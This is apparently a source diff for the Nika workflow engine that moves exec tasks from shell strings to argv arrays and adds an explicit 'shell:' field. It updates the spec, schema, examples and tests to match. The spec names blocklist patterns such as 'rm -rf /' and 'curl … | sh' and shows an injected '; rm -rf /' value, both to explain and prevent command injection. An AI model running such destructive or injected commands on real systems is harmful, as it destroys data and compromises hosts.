         assert!(err.contains("findings") && err.contains("NIKA-"), "{err}");
     }

--- a/crates/nika-pack/pack/canon.yaml
+++ b/crates/nika-pack/pack/canon.yaml
@@ -285,6 +285,7 @@ error_codes:
     - { code: NIKA-VAR-006, category: variable_error, transient: "false", failure: "expression type error at evaluation — cross-type compare · non-boolean when: value · for_each over a non-array" }
     - { code: NIKA-VAR-007, category: variable_error, transient: "false", failure: "bytes value substituted into a string position" }
     - { code: NIKA-VAR-008, category: validation_error, transient: "false", failure: "unclosed ${{ opener" }
+    - { code: NIKA-VAR-020, category: validation_error, transient: "false", failure: "bare tasks.X is the envelope, not a value — the projection set (.output/.status/.error/.duration_ms) is closed and required (04 §namespaces · 0.103 · #75 D2)" }
     - { code: NIKA-VAR-009, category: validation_error, transient: "false", failure: "typed outputs value did not match its declared type: at run end (the output half of the callable contract)" }
     - { code: NIKA-INFER-001, category: provider_error, transient: "engine-assessed", failure: "provider call failed (HTTP error · provider refusal)" }
     - { code: NIKA-INFER-002, category: validation_error, transient: "false", failure: "structured output failed schema validation (after any engine-internal retries)" }

--- a/crates/nika-pack/pack/canon.yaml
+++ b/crates/nika-pack/pack/canon.yaml
@@ -249,7 +249,7 @@ error_categories:
 # check binds the prose table to it (same row set · same fields).
 # transient · false | engine-assessed
 error_codes:
-  count: 52
+  count: 53
   reference: spec/05-errors.md
   items:
     - { code: NIKA-PARSE-001, category: parse_error, transient: "false", failure: "the YAML itself does not parse (syntax error)" }

--- a/crates/nika-pack/pack/examples/03-exec-pipeline.nika.yaml
+++ b/crates/nika-pack/pack/examples/03-exec-pipeline.nika.yaml
@@ -24,13 +24,13 @@ tasks:
   - id: test
     timeout: "5m"
     exec:
-      command: "sh -lc 'cargo test --workspace --lib'"
+      shell: "cargo test --workspace --lib"   # shell: is the explicit shell door (was: sh -lc wrapper)
       cwd: "."                       # your repo IS the pipeline's world
       capture: structured            # → { stdout, stderr, exit_code }
     on_finally:
       # ALWAYS runs · best-effort · cleanup errors are logged, never propagated
       - exec:
-          command: "rm -rf ./target/tmp"
+          command: ["rm", "-rf", "./target/tmp"]
       - invoke:
           tool: nika:emit
           args:
@@ -42,5 +42,5 @@ tasks:
     depends_on: [test]
     when: ${{ tasks.test.status == 'success' && tasks.test.output.exit_code == 0 }}
     exec:
-      command: "./deploy.sh"                 # your ship step · unreached until tests are green
+      command: ["./deploy.sh"]                 # your ship step · unreached until tests are green
       cwd: "."

--- a/crates/nika-pack/pack/examples/manifest.yaml
+++ b/crates/nika-pack/pack/examples/manifest.yaml
@@ -11,7 +11,7 @@ foundation:
   - file: examples/02-parallel-fanout.nika.yaml
     sha256_16: 728605e34575d6d4
   - file: examples/03-exec-pipeline.nika.yaml
-    sha256_16: b273d97d2a36e5d8
+    sha256_16: a322f957b9b7d68b
   - file: examples/04-schema-retry.nika.yaml
     sha256_16: c9d9a0f6e6dfb9c5
   - file: examples/05-fetch-chain.nika.yaml
@@ -77,7 +77,7 @@ showcase:
     tier: T1
     description: "Read yesterday's commits, write today's standup note"
     constructs: [local_model, outputs]
-    sha256_16: 7eb94164ea5e1930
+    sha256_16: 480daf717090e1c4
   - file: examples/showcase/t2-bookmark-triage.nika.yaml
     workflow: bookmark-triage
     tier: T2
@@ -119,7 +119,7 @@ showcase:
     tier: T2
     description: "git log \u2192 typed release notes \u2192 CHANGELOG insert \u2192 team ping"
     constructs: [local_model, outputs, schema, secrets]
-    sha256_16: a80ccd181ba72b31
+    sha256_16: 6678dcc29088d7e1
   - file: examples/showcase/t2-release-radar.nika.yaml
     workflow: release-radar
     tier: T2
@@ -167,7 +167,7 @@ showcase:
     tier: T3
     description: "changed files \u2192 one read-only review agent each \u2192 merged REVIEW.md"
     constructs: [agent_tools, fail_fast, for_each, local_model, max_parallel, on_error, outputs, schema]
-    sha256_16: d9d58782dd4bbc70
+    sha256_16: b5970c0e35ae8516
   - file: examples/showcase/t3-resume-screener.nika.yaml
     workflow: resume-screener
     tier: T3
@@ -179,7 +179,7 @@ showcase:
     tier: T4
     description: "news + repo pulse + KPIs \u2192 thinking synthesis \u2192 dated brief + cost ping"
     constructs: [local_model, on_finally, output, outputs, secrets, thinking]
-    sha256_16: 6e2a3205ba5dd4f9
+    sha256_16: 62190a77cef5e0e1
   - file: examples/showcase/t4-deep-research-brief.nika.yaml
     workflow: deep-research-brief
     tier: T4
@@ -191,10 +191,10 @@ showcase:
     tier: T4
     description: "parallel evidence \u2192 typed timeline \u2192 settle + recheck \u2192 postmortem draft"
     constructs: [capture, local_model, on_finally, outputs, retry, schema, secrets, thinking, when]
-    sha256_16: 566efa883a452e5d
+    sha256_16: 1cb4de7afa918a28
   - file: examples/showcase/t4-release-train.nika.yaml
     workflow: release-train
     tier: T4
     description: "parallel gates \u2192 human GO \u2192 hold until the window \u2192 ship \u00b7 verify \u00b7 record"
     constructs: [capture, on_finally, outputs, retry, secrets, timeout, typed_vars, when]
-    sha256_16: 6c4324567481b8bb
+    sha256_16: 2fc4fd2137e7e048

--- a/crates/nika-pack/pack/examples/showcase/t1-standup-digest.nika.yaml
+++ b/crates/nika-pack/pack/examples/showcase/t1-standup-digest.nika.yaml
@@ -30,7 +30,7 @@ tasks:
 
   - id: history
     exec:
-      command: "git log --since=yesterday --oneline --no-merges"
+      command: ["git", "log", "--since=yesterday", "--oneline", "--no-merges"]
 
   - id: digest
     depends_on: [today, history]

--- a/crates/nika-pack/pack/examples/showcase/t2-release-notes.nika.yaml
+++ b/crates/nika-pack/pack/examples/showcase/t2-release-notes.nika.yaml
@@ -36,7 +36,7 @@ secrets:
 tasks:
   - id: history
     exec:
-      command: "git log ${{ vars.since_tag }}..HEAD --oneline --no-merges"
+      command: ["git", "log", "${{ vars.since_tag }}..HEAD", "--oneline", "--no-merges"]
 
   - id: notes
     depends_on: [history]

--- a/crates/nika-pack/pack/examples/showcase/t3-pr-review-fanout.nika.yaml
+++ b/crates/nika-pack/pack/examples/showcase/t3-pr-review-fanout.nika.yaml
@@ -31,7 +31,7 @@ vars:
 tasks:
   - id: changed
     exec:
-      command: "git diff --name-only ${{ vars.base_ref }}...HEAD"
+      command: ["git", "diff", "--name-only", "${{ vars.base_ref }}...HEAD"]
 
   - id: files
     depends_on: [changed]

--- a/crates/nika-pack/pack/examples/showcase/t4-ceo-monday-brief.nika.yaml
+++ b/crates/nika-pack/pack/examples/showcase/t4-ceo-monday-brief.nika.yaml
@@ -51,7 +51,7 @@ tasks:
   # ── branch 2 · engineering pulse ──
   - id: pulse
     exec:
-      command: "git shortlog -sn --since='1 week ago'"
+      command: ["git", "shortlog", "-sn", "--since=1 week ago"]
 
   # ── branch 3 · the numbers ──
   - id: kpi_raw

--- a/crates/nika-pack/pack/examples/showcase/t4-incident-war-room.nika.yaml
+++ b/crates/nika-pack/pack/examples/showcase/t4-incident-war-room.nika.yaml
@@ -41,7 +41,7 @@ tasks:
   # ── the gather wave · all three run in parallel ──
   - id: logs
     exec:
-      command: "journalctl -u ${{ vars.service }} --since '${{ vars.log_window }}' --no-pager"
+      command: ["journalctl", "-u", "${{ vars.service }}", "--since", "${{ vars.log_window }}", "--no-pager"]
       capture: structured
 
   - id: status_history

--- a/crates/nika-pack/pack/examples/showcase/t4-release-train.nika.yaml
+++ b/crates/nika-pack/pack/examples/showcase/t4-release-train.nika.yaml
@@ -48,19 +48,19 @@ tasks:
   # ── the gate wave · all three run in parallel ──
   - id: tests
     exec:
-      command: "cargo test --workspace --quiet"
+      command: ["cargo", "test", "--workspace", "--quiet"]
       capture: structured
     timeout: "15m"
 
   - id: lint
     exec:
-      command: "cargo clippy --workspace --all-targets -- -D warnings"
+      command: ["cargo", "clippy", "--workspace", "--all-targets", "--", "-D", "warnings"]
       capture: structured
     timeout: "10m"
 
   - id: audit
     exec:
-      command: "cargo audit"
+      command: ["cargo", "audit"]
       capture: structured
     timeout: "5m"
     retry:
@@ -113,7 +113,7 @@ tasks:
   - id: ship
     depends_on: [hold]
     exec:
-      command: "./scripts/release.sh ${{ vars.version }}"
+      command: ["./scripts/release.sh", "${{ vars.version }}"]   # argv: the interpolation cannot break out
       capture: structured
     timeout: "30m"
 

--- a/crates/nika-pack/pack/schemas/workflow.schema.json
+++ b/crates/nika-pack/pack/schemas/workflow.schema.json
@@ -507,25 +507,15 @@
     },
     "exec": {
       "type": "object",
-      "required": [
-        "command"
-      ],
       "additionalProperties": false,
       "properties": {
         "command": {
-          "description": "String -> /bin/sh -c (shell). Array -> execve, no shell (the injection-safe form).",
-          "oneOf": [
-            {
-              "type": "string"
-            },
-            {
-              "type": "array",
-              "items": {
-                "type": "string"
-              },
-              "minItems": 1
-            }
-          ]
+          "description": "argv — the program and its arguments, execve, NO shell. Each element substituted independently (the injection-safe form). Shell features (pipes · redirects · globs) live in `shell:`.",
+          "type": "array",
+          "items": {
+            "type": "string"
+          },
+          "minItems": 1
         },
         "cwd": {
           "type": "string"
@@ -547,8 +537,25 @@
             "combined",
             "structured"
           ]
+        },
+        "shell": {
+          "description": "One shell line, run via /bin/sh -c — the EXPLICIT dangerous door (pipes · redirects · globs). The blocklist applies here; interpolating untrusted values here is on the author. Exactly one of command|shell.",
+          "type": "string",
+          "minLength": 1
         }
-      }
+      },
+      "oneOf": [
+        {
+          "required": [
+            "command"
+          ]
+        },
+        {
+          "required": [
+            "shell"
+          ]
+        }
+      ]
     },
     "invoke": {
       "type": "object",

--- a/crates/nika-pack/pack/spec/02-verbs.md
+++ b/crates/nika-pack/pack/spec/02-verbs.md
@@ -115,7 +115,7 @@ Run a shell command. The result is the command's stdout (default) or a structure
 ```yaml
 - id: build
   exec:
-    command: "cargo build --release"
+    command: ["cargo", "build", "--release"]
 ```
 
 ### Full
@@ -124,7 +124,7 @@ Run a shell command. The result is the command's stdout (default) or a structure
 - id: test
   timeout: "60s"                   # task-level (applies to any verb · Go duration · see 03-dag)
   exec:
-    command: "cargo test --workspace --lib"
+    command: ["cargo", "test", "--workspace", "--lib"]
     cwd: "./engine"
     env:
       RUST_LOG: "debug"
@@ -136,7 +136,8 @@ Run a shell command. The result is the command's stdout (default) or a structure
 
 | Field | Required | Type | Notes |
 |---|---|---|---|
-| `command` | yes | string \| array | **String** → run via the OS shell (`/bin/sh -c`) · pipes/redirects work · the shell blocklist applies. **Array** (`["prog", "arg", …]`) → direct `execve`, **NO shell** · each element substituted independently · the one-obvious-way for any command carrying interpolated or untrusted values (see Security). May use `${{ ... }}`. |
+| `command` | one of | array | **argv** — `["prog", "arg", …]` → direct `execve`, **NO shell** · each element substituted independently — an interpolated `${{ }}` value can never break out of its argument (see Security). Exactly one of `command` \| `shell`. |
+| `shell` | one of | string | **The explicit shell door** — one line run via `/bin/sh -c` · pipes · redirects · globs. The blocklist applies HERE; interpolating untrusted values here is the author's own risk, visibly. Exactly one of `command` \| `shell`. *(D1 · #75: semantics never fork on a YAML type — the field name carries the meaning. The old string `command:` is rejected at parse.)* |
 | `cwd` | no | string | Working directory · default = engine's cwd |
 | `env` | no | object | OS environment variables for **this subprocess** · key→value map |
 | `stdin` | no | string | Stdin data · may use `${{ ... }}` |
@@ -154,15 +155,15 @@ Run a shell command. The result is the command's stdout (default) or a structure
 
 A v0.1-compliant engine MUST ·
 
-- **Honor the two `command` forms** · a **string** runs through `/bin/sh -c` (the shell-feature path · pipes · redirects); an **array** runs through `execve` with NO shell: `command[0]` is the program, the rest are argv passed verbatim, each element substituted independently.
-- Implement a shell **blocklist** for dangerous commands on the STRING form (see reference impl `nika-policy` for canonical list · 100+ patterns including `rm -rf /` · `chmod 777` · `curl … | sh` · etc.)
+- **Honor the two exec bodies** · `command:` (array) runs through `execve` with NO shell: `command[0]` is the program, the rest are argv passed verbatim, each element substituted independently. `shell:` (string) runs through `/bin/sh -c` — the shell-feature path (pipes · redirects · globs). **Exactly one** of the two; a string `command:` (the pre-0.103 implicit-shell form) is rejected at parse (`NIKA-PARSE` · `validation_error`).
+- Implement a shell **blocklist** for dangerous commands on `shell:` (see reference impl `nika-policy` for canonical list · 100+ patterns including `rm -rf /` · `chmod 777` · `curl … | sh` · etc.)
 - Reject blocklist matches with a clear error
 - Honor `timeout` with a hard kill (Go-duration string · see 03-dag)
 - Sandbox `cwd` if configured (engine-specific)
 
 > **The argv form is the STRUCTURAL fix for command injection: prefer it.**
 > A `${{ }}`-interpolated value in the STRING form is shell-parsed:
-> `command: "process ${{ item }}"` with `item == "; rm -rf /"` is a classic
+> `shell: "process ${{ item }}"` with `item == "; rm -rf /"` is a classic
 > injection, and the blocklist is a *detector* (best-effort), not a guarantee.
 > The ARRAY form removes the shell entirely: `command: ["process", "${{ item }}"]`
 > passes `item` as ONE argv element no matter what it contains; there is no

--- a/crates/nika-pack/pack/spec/03-dag.md
+++ b/crates/nika-pack/pack/spec/03-dag.md
@@ -89,7 +89,7 @@ A list of task ids this task depends on. The engine MUST not start this task unt
   depends_on: [build]                    # the success-gate — depends_on already requires it
   when: ${{ tasks.build.output.warnings == 0 }}   # when: is for conditions BEYOND success
   exec:
-    command: "./notify.sh"
+    command: ["./notify.sh"]
 ```
 
 #### Expression language · a documented subset of CEL
@@ -228,13 +228,13 @@ infer the edge (a verb-body reference is an edge too · no invisible edges).
 # ❌ REJECTED at parse — `when:` reads tasks.test but no depends_on
 - id: deploy
   when: ${{ tasks.test.status == 'success' }}
-  exec: { command: "./deploy.sh" }
+  exec: { command: ["./deploy.sh"] }
 
 # ✅ CORRECT — the reference is backed by an explicit edge
 - id: deploy
   depends_on: [test]
   when: ${{ tasks.test.status == 'success' }}
-  exec: { command: "./deploy.sh" }
+  exec: { command: ["./deploy.sh"] }
 ```
 
 **Why explicit, not inferred** · an inferred edge is an invisible edge: it
@@ -343,7 +343,7 @@ sequential iteration · set `max_parallel: 1` ·
   for_each: ${{ vars.items }}
   max_parallel: 1                              # iterations run one-at-a-time, in order
   exec:
-    command: "process ${{ item }}"
+    command: ["process", "${{ item }}"]
 ```
 
 #### `max_parallel:` · *optional · cap concurrent iterations*
@@ -435,7 +435,7 @@ without statically enumerating tasks.
 - id: long_task
   timeout: "5m"             # 5 minutes
   exec:
-    command: "./long-running.sh"
+    command: ["./long-running.sh"]
 ```
 
 Hard timeout for the entire task (including any retries and their backoff
@@ -570,9 +570,19 @@ downstream reads `status: "failure"`. Contrast · the same evaluation error
 in a verb-body position (`args:` · `prompt:` · …) is task-stage work and IS
 recoverable by that task's `on_error`.
 
-> **`depends_on` IS the success-gate.** Do NOT write
-> `when: ${{ tasks.X.status == 'success' }}` as a plain gate: it is **redundant**
-> (`depends_on` already requires success). Use `when:` ONLY for conditions BEYOND
+> **The gate algebra (normative).** The three gate forms PROPAGATE
+> differently — the pattern `when: ${{ tasks.X.status == 'success' }}`
+> is never a no-op, it is a propagation CHOICE:
+>
+> | upstream X ends | plain `depends_on` (default gate) | `when: ${{ tasks.X.status == 'success' }}` |
+> |---|---|---|
+> | `success` | run | run |
+> | `skipped` | **run** (skipped passes the default gate) | **skipped** (the anti-skip choice · [05 §skip-interaction](./05-errors.md)) |
+> | `failure` / `cancelled` | **cancelled** — and the hard stop cascades downstream | **skipped** — and downstream's default gate passes on skipped: **the chain continues** |
+>
+> Choose knowingly: the default gate is the hard-stop cascade; the
+> status-comparison converts a failure into skip-once-then-continue.
+> Use `when:` for conditions BEYOND
 > the default gate · a value check (`tasks.X.output.coverage > 80`) · an env check
 > · or to **exclude a skipped** upstream (`when: status == 'success'` is meaningful
 > only when X may be `skipped` via `on_error: skip`).
@@ -602,7 +612,7 @@ tasks:
 ```yaml
 tasks:
   - id: setup
-    exec: { command: "./prepare.sh" }
+    exec: { command: ["./prepare.sh"] }
   - id: analyze_a
     depends_on: [setup]
     infer: { prompt: "Analyze A" }
@@ -629,21 +639,21 @@ tasks:
 ```yaml
 tasks:
   - id: check
-    exec: { command: "./check-env.sh", capture: structured }
+    exec: { command: ["./check-env.sh"], capture: structured }
 
   - id: build_prod
     depends_on: [check]
     when: ${{ tasks.check.output.env == 'production' }}
-    exec: { command: "./build.sh --release" }
+    exec: { command: ["./build.sh", "--release"] }
 
   - id: build_dev
     depends_on: [check]
     when: ${{ tasks.check.output.env != 'production' }}
-    exec: { command: "./build.sh --debug" }
+    exec: { command: ["./build.sh", "--debug"] }
 
   - id: deploy
     depends_on: [build_prod, build_dev]
-    exec: { command: "./deploy.sh" }
+    exec: { command: ["./deploy.sh"] }
 ```
 
 Exactly one of `build_prod` or `build_dev` runs · the other is skipped · `deploy` runs after both (one success + one skipped).
@@ -708,10 +718,10 @@ single source prevents).
 ```yaml
 - id: process
   exec:
-    command: "./process.sh > /tmp/output.json"
+    shell: "./process.sh > /tmp/output.json"   # redirect → the explicit shell door
   on_finally:                                  # runs always · success/fail/timeout/cancel
     - exec:
-        command: "rm -f /tmp/output.json"
+        command: ["rm", "-f", "/tmp/output.json"]
     - invoke:
         tool: nika:emit
         args: { event: "task_completed", task_id: "process" }
@@ -750,7 +760,7 @@ completes · REGARDLESS of outcome (success · failure · timeout · cancel).
 ```yaml
 # 1 · cleanup temp files (scratch_dir declared in envelope vars:)
 on_finally:
-  - exec: { command: "rm -rf ${{ vars.scratch_dir }}" }
+  - exec: { command: ["rm", "-rf", "${{ vars.scratch_dir }}"] }   # argv: the var cannot break out
 
 # 2 · always-emit completion event
 on_finally:

--- a/crates/nika-pack/pack/spec/04-variables.md
+++ b/crates/nika-pack/pack/spec/04-variables.md
@@ -42,12 +42,22 @@ DSL. See [03-dag.md](./03-dag.md#expression-language--a-documented-subset-of-cel
 ```
 ${{ vars.X }}             workflow inputs               (declared in envelope `vars:` · untyped or typed)
 ${{ with.X }}             task-level scope               (declared per-task `with:` block)
-${{ tasks.X.output }}      task output reference          (or .status · .error · .duration_ms)
+${{ tasks.X.output }}      task output reference          (or .status · .error · .duration_ms · the CLOSED projection set)
 ${{ env.X }}              environment variable           (non-sensitive runtime config)
 ${{ secrets.X }}          masked secret reference        (vault-backed · never in logs)
 ```
 
 Five namespaces. That's it.
+
+> **Bare `tasks.X` is not a value (normative · D2 · #75).** The task
+> result is a record; its observable projections are the CLOSED set
+> `.output` (the value) · `.status` (terminal enum) · `.error` ·
+> `.duration_ms` — additions are a spec minor. An UNPROJECTED
+> `${{ tasks.X }}` in any value position is a `validation_error`
+> (`NIKA-VAR` · « the envelope is not a value — pick `.output` »):
+> before 0.103 it silently denoted the whole envelope, the source of
+> the golden-drift trap engine#524 had to teach around. No aliases —
+> one meaning per spelling.
 
 > **Loop-locals are not a 6th namespace.** Inside a `for_each` task body, two
 > extra identifiers are in scope: `${{ item }}` (the current element) and
@@ -121,7 +131,7 @@ Reference any upstream task's output (or status · error · duration_ms) ·
   depends_on: [build, test]
   when: ${{ tasks.test.status == 'success' && tasks.test.output.coverage > 80 }}
   exec:
-    command: "./deploy.sh ${{ tasks.build.output.artifact_path }}"
+    command: ["./deploy.sh", "${{ tasks.build.output.artifact_path }}"]
 ```
 
 `tasks.X` is the task **result record**: a CEL object, NOT the bare output

--- a/crates/nika-pack/pack/spec/05-errors.md
+++ b/crates/nika-pack/pack/spec/05-errors.md
@@ -104,6 +104,7 @@ these from this file alone.
 | `NIKA-VAR-006` | expression type error at evaluation — cross-type compare · non-boolean `when:` value · `for_each` over a non-array | `variable_error` | false |
 | `NIKA-VAR-007` | bytes value substituted into a string position | `variable_error` | false |
 | `NIKA-VAR-008` | unclosed `${{` opener | `validation_error` | false |
+| `NIKA-VAR-020` | bare `tasks.X` is the envelope, not a value — pick `.output` (closed projection set · 04 §namespaces) | `validation_error` | false |
 | `NIKA-VAR-009` | typed `outputs` value did not match its declared `type:` at run end (the output half of the callable contract · [01 §engine MUST](./01-envelope.md)) | `validation_error` | false |
 | `NIKA-INFER-001` | provider call failed (HTTP error · provider refusal) | `provider_error` | engine-assessed |
 | `NIKA-INFER-002` | structured output failed `schema:` validation (after any engine-internal retries) | `validation_error` | false |
@@ -330,14 +331,14 @@ fetch-chain pattern · a local `nika:read` beside a live fetch).
 
 # Skip on error · downstream may handle
 - id: optional_step
-  exec: { command: "./optional.sh" }
+  exec: { command: ["./optional.sh"] }
   on_error:
     skip: true
 
 - id: next
   depends_on: [optional_step]
   when: ${{ tasks.optional_step.status == 'success' }}   # only run if not skipped
-  exec: { command: "..." }
+  exec: { command: ["..."] }
 ```
 
 ---

--- a/crates/nika-pack/pack/spec/08-out-of-scope.md
+++ b/crates/nika-pack/pack/spec/08-out-of-scope.md
@@ -49,9 +49,9 @@ tasks: ...
       workflow: ./subroutine.nika.yaml
 ```
 
-**Why deferred** · subroutine calling needs scope/binding rules that need thought · plus risks of stack overflow (recursion) and scheduler complexity. The proposed `nika:run` builtin is therefore deferred from v0.1 · use `exec: command: "nika run subroutine.yaml"` as the workaround.
+**Why deferred** · subroutine calling needs scope/binding rules that need thought · plus risks of stack overflow (recursion) and scheduler complexity. The proposed `nika:run` builtin is therefore deferred from v0.1 · use `exec: shell: "nika run subroutine.yaml"` as the workaround.
 
-Workaround in v0.1 · use `exec: command: "nika run subroutine.yaml --output json"` to launch a sibling workflow process: `--output json` (engine CLI) prints the sub-workflow's typed `outputs:` as JSON on stdout · the parent binds it back with `capture: stdout` + a jq `output:` (the typed contract survives the process boundary).
+Workaround in v0.1 · use `exec: shell: "nika run subroutine.yaml --output json"` to launch a sibling workflow process: `--output json` (engine CLI) prints the sub-workflow's typed `outputs:` as JSON on stdout · the parent binds it back with `capture: stdout` + a jq `output:` (the typed contract survives the process boundary).
 
 **Recursion guard (normative TODAY · even for the workaround)** · a run that
 launches runs (through the workaround now, through `nika:run` when it lands)
@@ -98,7 +98,7 @@ macro retry_with_backoff:
 - id: poll_until
   while: ${{ tasks.check.output.ready == false }}
   exec:
-    command: "./check.sh"
+    command: ["./check.sh"]
 ```
 
 **Why deferred** · unbounded loops break the « acyclic » guarantee of the DAG

--- a/crates/nika-registry-client/src/tests.rs
+++ b/crates/nika-registry-client/src/tests.rs
@@ -11,7 +11,7 @@ use nika_kernel_mock::MockHttp;
 
 const REV: &str = "0123456789abcdef0123456789abcdef01234567";
 const BODY: &[u8] =
-    b"nika: v1\nworkflow: greet\ntasks:\n  - id: a\n    exec: { command: \"echo hi\" }\n";
+    b"nika: v1\nworkflow: greet\ntasks:\n  - id: a\n    exec: { command: [\"echo\", \"hi\"] }\n";
 
 fn kind_code(err: &RegistryError) -> Option<&'static str> {
     err.code()

--- a/crates/nika-runtime/src/pause.rs
+++ b/crates/nika-runtime/src/pause.rs
@@ -233,7 +233,7 @@ mod tests {
         );
         // A non-prompt task failing with the same code text never pauses.
         let exec_wf =
-            parse("nika: v1\nworkflow: t\ntasks:\n  - id: ask\n    exec: { command: \"true\" }\n");
+            parse("nika: v1\nworkflow: t\ntasks:\n  - id: ask\n    exec: { command: [\"true\"] }\n");
         assert!(
             prompt_block(
                 &failed_finish("ask", PROMPT_BLOCKED_CODE),
@@ -277,7 +277,7 @@ mod tests {
         use nika_event::EventKind;
         use nika_kernel::tool_executor::{ToolErrorMeta, ToolResult};
 
-        const GATED: &str = "nika: v1\nworkflow: gated\ntasks:\n  - id: prep\n    exec: { command: \"echo ready\" }\n  - id: ask\n    depends_on: [prep]\n    invoke:\n      tool: \"nika:prompt\"\n      args: { mode: \"input\", message: \"proceed?\" }\n  - id: after\n    depends_on: [ask]\n    exec: { command: \"echo done\" }\n";
+        const GATED: &str = "nika: v1\nworkflow: gated\ntasks:\n  - id: prep\n    exec: { command: [\"echo\", \"ready\"] }\n  - id: ask\n    depends_on: [prep]\n    invoke:\n      tool: \"nika:prompt\"\n      args: { mode: \"input\", message: \"proceed?\" }\n  - id: after\n    depends_on: [ask]\n    exec: { command: [\"echo\", \"done\"] }\n";
 
         let blocked_prompt = || {
             let mut result = ToolResult::error("tc1", "non-interactive and no `default:`");
@@ -477,7 +477,7 @@ mod tests {
         // `${{ tasks.missing.output }}` cannot render (no record) — the
         // payload carries the AUTHORED text instead of blocking the pause.
         let wf = parse(
-            "nika: v1\nworkflow: t\ntasks:\n  - id: up\n    exec: { command: \"true\" }\n  - id: ask\n    depends_on: [up]\n    invoke:\n      tool: \"nika:prompt\"\n      args: { mode: \"input\", message: \"about ${{ tasks.up.output }}\" }\n",
+            "nika: v1\nworkflow: t\ntasks:\n  - id: up\n    exec: { command: [\"true\"] }\n  - id: ask\n    depends_on: [up]\n    invoke:\n      tool: \"nika:prompt\"\n      args: { mode: \"input\", message: \"about ${{ tasks.up.output }}\" }\n",
         );
         let (records, vars, markers) = (BTreeMap::new(), BTreeMap::new(), BTreeMap::new());
         let pause = prompt_block(

--- a/crates/nika-runtime/src/resume.rs
+++ b/crates/nika-runtime/src/resume.rs
@@ -795,7 +795,7 @@ mod tests {
 
     #[test]
     fn upstream_output_change_cascades_into_the_input_hash() {
-        const DOWNSTREAM: &str = "nika: v1\nworkflow: t\ntasks:\n  - id: use\n    exec: { command: \"echo ${{ tasks.up.output }}\" }\n";
+        const DOWNSTREAM: &str = "nika: v1\nworkflow: t\ntasks:\n  - id: use\n    exec: { command: [\"echo\", \"${{ tasks.up.output }}\"] }\n";
         let vars = BTreeMap::new();
         let r1 = BTreeMap::from([("up".to_owned(), success_record(json!("v1")))]);
         let r2 = BTreeMap::from([("up".to_owned(), success_record(json!("v2")))]);
@@ -814,7 +814,7 @@ mod tests {
     /// the reference re-keys.
     #[test]
     fn secret_value_never_participates_the_reference_identity_does() {
-        const WITH_SECRET: &str = "nika: v1\nworkflow: t\nsecrets:\n  tok: { source: env, key: MY_TOKEN }\ntasks:\n  - id: call\n    exec: { command: \"curl -H 'x: ${{ secrets.tok }}'\" }\n";
+        const WITH_SECRET: &str = "nika: v1\nworkflow: t\nsecrets:\n  tok: { source: env, key: MY_TOKEN }\ntasks:\n  - id: call\n    exec: { command: [\"curl\", \"-H\", \"'x:\", \"${{ secrets.tok }}'\"] }\n";
         let wf = parse(WITH_SECRET);
         let records = BTreeMap::new();
         let vars = BTreeMap::new();
@@ -878,7 +878,7 @@ mod tests {
         // A task that PINS its own `model:` · an exec task — the two
         // no-re-key controls (items live at scope top · lint law).
         const PINNED: &str = "nika: v1\nworkflow: t\nmodel: ollama/qwen3.5:4b\ntasks:\n  - id: summary\n    infer: { prompt: \"hi\", model: \"mock/echo\" }\n";
-        const EXEC: &str = "nika: v1\nworkflow: t\nmodel: ollama/qwen3.5:4b\ntasks:\n  - id: run\n    exec: { command: \"echo hi\" }\n";
+        const EXEC: &str = "nika: v1\nworkflow: t\nmodel: ollama/qwen3.5:4b\ntasks:\n  - id: run\n    exec: { command: [\"echo\", \"hi\"] }\n";
         let records = BTreeMap::new();
         let vars = BTreeMap::new();
         let env = BTreeMap::new();
@@ -990,7 +990,7 @@ mod tests {
     /// carries secret-derived material, not even inside a hash.
     #[test]
     fn secret_leaked_through_an_upstream_record_disables_the_stamp() {
-        const DOWNSTREAM: &str = "nika: v1\nworkflow: t\nsecrets:\n  tok: { source: env, key: T }\ntasks:\n  - id: use\n    exec: { command: \"echo ${{ tasks.up.output }}\" }\n";
+        const DOWNSTREAM: &str = "nika: v1\nworkflow: t\nsecrets:\n  tok: { source: env, key: T }\ntasks:\n  - id: use\n    exec: { command: [\"echo\", \"${{ tasks.up.output }}\"] }\n";
         let wf = parse(DOWNSTREAM);
         let ctx = ResumeContext::of(
             &wf,
@@ -1019,8 +1019,8 @@ mod tests {
     /// order produce the SAME stamp (JCS sorts keys at every depth).
     #[test]
     fn with_declaration_order_is_canonicalized_away() {
-        const AB: &str = "nika: v1\nworkflow: t\ntasks:\n  - id: t\n    with: { a: \"1\", b: \"2\" }\n    exec: { command: \"echo ${{ with.a }} ${{ with.b }}\" }\n";
-        const BA: &str = "nika: v1\nworkflow: t\ntasks:\n  - id: t\n    with: { b: \"2\", a: \"1\" }\n    exec: { command: \"echo ${{ with.a }} ${{ with.b }}\" }\n";
+        const AB: &str = "nika: v1\nworkflow: t\ntasks:\n  - id: t\n    with: { a: \"1\", b: \"2\" }\n    exec: { command: [\"echo\", \"${{ with.a }}\", \"${{ with.b }}\"] }\n";
+        const BA: &str = "nika: v1\nworkflow: t\ntasks:\n  - id: t\n    with: { b: \"2\", a: \"1\" }\n    exec: { command: [\"echo\", \"${{ with.a }}\", \"${{ with.b }}\"] }\n";
         let records = BTreeMap::new();
         let vars = BTreeMap::new();
         let a = stamp_of(AB, &records, &vars).expect("eligible");
@@ -1033,7 +1033,7 @@ mod tests {
     /// input hashes (the number pre-fold carries full i64 fidelity).
     #[test]
     fn int64_beyond_2p53_never_collide() {
-        const WF: &str = "nika: v1\nworkflow: t\nvars:\n  id: { type: integer, default: 1 }\ntasks:\n  - id: t\n    exec: { command: \"echo ${{ vars.id }}\" }\n";
+        const WF: &str = "nika: v1\nworkflow: t\nvars:\n  id: { type: integer, default: 1 }\ntasks:\n  - id: t\n    exec: { command: [\"echo\", \"${{ vars.id }}\"] }\n";
         let records = BTreeMap::new();
         // 2^53 + 1 and 2^53 + 2 are the SAME f64 — distinct i64s.
         let a_vars = BTreeMap::from([("id".to_owned(), json!(9_007_199_254_740_993_i64))]);
@@ -1061,8 +1061,8 @@ mod tests {
     /// is not resume-eligible (fail-closed, never a wrong skip).
     #[test]
     fn fan_out_collection_participates_and_deep_item_nav_is_ineligible() {
-        const SHALLOW: &str = "nika: v1\nworkflow: t\nvars:\n  urls: [\"a\", \"b\"]\ntasks:\n  - id: fan\n    for_each: ${{ vars.urls }}\n    exec: { command: \"echo ${{ item }}\" }\n";
-        const DEEP: &str = "nika: v1\nworkflow: t\nvars:\n  rows: [{ url: \"a\" }]\ntasks:\n  - id: fan\n    for_each: ${{ vars.rows }}\n    exec: { command: \"echo ${{ item.url }}\" }\n";
